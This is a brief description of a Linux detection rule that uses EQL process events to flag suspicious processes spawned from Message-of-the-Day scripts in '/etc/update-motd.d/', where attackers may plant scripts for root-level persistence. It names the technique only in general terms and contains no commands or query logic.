This detection rule focuses on identifying potentially malicious processes spawned from the Message-of-the-Day (MOTD) on Linux systems. The MOTD is a configurable message displayed to users upon logging into a Linux server via SSH or a serial connection. By default, MOTD files in the '/etc/update-motd.d/' directory can run scripts as the root user each time a connection is made. Attackers can exploit this by injecting malicious scripts, gaining persistence, and executing nefarious commands whenever a user logs in. This rule leverages EQL (Event Query Language) to analyze process events, filtering for specific command executions that stem from MOTD scripts, which should be investigated further as they deviate from normal benign behavior. The investigation guide provides detailed steps on querying the file system and observing the context of the executions to identify potential compromises.